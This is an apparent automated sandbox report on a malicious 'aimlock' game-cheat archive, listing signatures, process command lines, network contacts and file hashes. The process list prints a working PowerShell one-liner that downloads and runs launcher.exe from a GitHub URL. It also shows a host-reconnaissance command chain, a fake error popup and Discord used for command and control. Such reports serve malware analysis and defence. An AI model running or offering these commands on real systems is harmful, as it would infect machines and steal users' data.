Analysis Overview
SHA256
dc27c8f9f692b5e118ed3151d587dfab9ae74942655b989f9f05718b80c3a2ca
Threat Level: Known bad
The file Xylex_Aimlock_V1.2.zip was found to be: Known bad.
Malicious Activity Summary
Grants admin privileges
Downloads MZ/PE file
Blocklisted process makes network request
Modifies Windows Firewall
Loads dropped DLL
Reads user/profile data of web browsers
Deletes itself
Executes dropped EXE
UPX packed file
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Launches sc.exe
Detects Pyinstaller
Unsigned PE
Detects videocard installed
Collects information from the system
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Gathers network information
Views/modifies file attributes
Gathers system information
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-10 14:26
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-10 14:26
Reported
2024-05-10 14:28
Platform
win10v2004-20240426-en
Max time kernel
67s
Max time network
69s
Command Line
Signatures
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Xylex_Aimlock_V1.2.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Xylex Aimlock\Xylex Aimlock - V1.2.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $down=New-Object System.Net.WebClient;$url='https://github.com/ptsd9/script/releases/download/launcher/launcher.exe';$file='launcher.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe
"C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe"
C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe
"C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "gdb --version"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get Manufacturer
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_ComputerSystem get Manufacturer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe
"C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe"
C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe
"C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.53.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| N/A | 127.0.0.1:64961 | tcp | |
| N/A | 127.0.0.1:64969 | tcp | |
| N/A | 127.0.0.1:64974 | tcp | |
| N/A | 127.0.0.1:64978 | tcp | |
| N/A | 127.0.0.1:64980 | tcp | |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
Files
memory/4648-0-0x00007FFFE95A3000-0x00007FFFE95A5000-memory.dmp
memory/4648-1-0x000001C185CD0000-0x000001C185CF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yojftb1n.jca.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4648-11-0x00007FFFE95A0000-0x00007FFFEA061000-memory.dmp
memory/4648-12-0x00007FFFE95A0000-0x00007FFFEA061000-memory.dmp
C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe
| MD5 | 28b40022d29441c18d99e53ab64c5bd1 |
| SHA1 | b368059d622f01825857d35fc91224087dd04faa |
| SHA256 | 6999c181cd66d568c3c58020a7b616b0bc7c35bb5e2c467f2eced88a458d7a1d |
| SHA512 | 78101e5e1b9ff327f79d81a7fbe78a0fbc853b62ec8f5875866cb9c33b3bc5ae0f264f8ad5e31ccfdf5810a03b6dcc5c64ee390b5be7a6ab6887e613f2ee8101 |
memory/4648-50-0x00007FFFE95A0000-0x00007FFFEA061000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\python311.dll
| MD5 | bd98d92c8c8b8c5983ef725a9bc953a9 |
| SHA1 | 1ad5435b23116ad85a55a55754c42bb788c36388 |
| SHA256 | e41f2d9e02e8498ec53f8286e86011c75e9da0f6b24b2d9979e6e5726ef28913 |
| SHA512 | 48fa76a57c12088d3e24b56e1ace114f028aac5ae383f7810b02dce2768820a7190fc1cc3fd4684a2f06e98c1ccc0641a3f1906e992d7a5736194989c072959e |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\VCRUNTIME140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
memory/4600-78-0x00007FFFE9A80000-0x00007FFFEA067000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\base_library.zip
| MD5 | 334e5d6e591eccd91d2121194db22815 |
| SHA1 | 821d70c44dc7f25a784e9938d74e75a3471e1ad0 |
| SHA256 | 9e830533f6e67b84d9dbc502db38a6f25d3c984f1a6a195a50f838d48d5b3ba5 |
| SHA512 | bac4a1283745e5eb4db953227bbf00831c8a0c3c831f5889e0d0630841e59c8ad96c3386ce3ad48300f4754fde188212edc79b78c9c98f76bca21987c1c05866 |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\python3.dll
| MD5 | 34e49bb1dfddf6037f0001d9aefe7d61 |
| SHA1 | a25a39dca11cdc195c9ecd49e95657a3e4fe3215 |
| SHA256 | 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281 |
| SHA512 | edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856 |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\libffi-8.dll
| MD5 | 8c3dfeb336b269a16912185fec18560a |
| SHA1 | 809f6454a7d1ae80bf503ca50a3400cf7162706c |
| SHA256 | 92038b9c69411bc4e32fbb7c0c995688261382066d40be1b3d19d15fe2c78587 |
| SHA512 | ee7515332aaf12feedd0b906e0d5f73cb076093ffd39ed90ce5545069acb737049f95733fe18e84fb04777d9895bded04038710832f6810cc0efa77e14879e94 |
memory/4600-88-0x00007FFFFFA70000-0x00007FFFFFA7F000-memory.dmp
memory/4600-87-0x00007FFFFB810000-0x00007FFFFB834000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_ctypes.pyd
| MD5 | 4aab5887ebdd7f0031f4635c6941b2ad |
| SHA1 | 88979cc0cbb1d592cd7f67c03207b3ed9f78721b |
| SHA256 | 4c09339cd35518c312861a93a8854f128472e894e22d08dfb9719b8fdbf21e02 |
| SHA512 | 82d39c716f0ac82c55ebd8cda44aaa4668a9c1425287023c45baf7bfe85367d44b71d2641da18561d43ab2c73f909a91dd39009794d094f15600ec05e301db2b |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_socket.pyd
| MD5 | 0a69997bc03a986bc7d75c60006945d8 |
| SHA1 | 0786395d697bdaed9333c7ce038f523aa73a2646 |
| SHA256 | 3798453f4d01c98253f8ee2305711375c55fc1b1388afd5c4b21342eb3979ba1 |
| SHA512 | 2eeb383f7087a1ae1069b74e78ede4ed99647973c3ff2312a1e41245bb7f3ede13d7545a3f4288687717058ce7eea62eb88297e697932863363c141be8e32ac3 |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\select.pyd
| MD5 | 51dbde6a032c1cb33fe0867c74a214d8 |
| SHA1 | 435cf4a6eb85973d536deac09ace2d086ed62eee |
| SHA256 | 8231b643a70605bb0127093a81b637ecae3628b3f4515ea3623af1ebd9988811 |
| SHA512 | 71fa7471cebea3b50e85b9b87c2e655b653a90b2277218efa277facbf052b638db8149adfb869d845f1214ed8c951dc724af972bc3e4bee6bd2656698ed58887 |
memory/4600-94-0x00007FFFFCA10000-0x00007FFFFCA1D000-memory.dmp
memory/4600-93-0x00007FFFEB500000-0x00007FFFEB519000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_bz2.pyd
| MD5 | 13ca9d614b2fad14df6dae63f09a7f1d |
| SHA1 | 47bb6802dc8ea1f668eecebafa2aa89f7c560b7d |
| SHA256 | f3c03bf8167a038c769b7e4138c7317ab6abbc3dffca5cf68837e16946fe4e3f |
| SHA512 | bba4d0ef66101dbf6335d814ae0cc4fe33fc2db015753bacd02cfa251ff56a57fc60b72ee01e7989b7f65b97fd2bfa573c5a20f15b0d408f072252ae3ad77ca5 |
memory/4600-98-0x00007FFFEB4E0000-0x00007FFFEB4F9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_lzma.pyd
| MD5 | 17b991325312d7cf2a693258260586eb |
| SHA1 | 28b8bd9250c35b579b599c5f41d95a5245486d4c |
| SHA256 | fa5b4120fabd142abec01d2e1b8d2931c566f7034e339023f19453c1ce032ea3 |
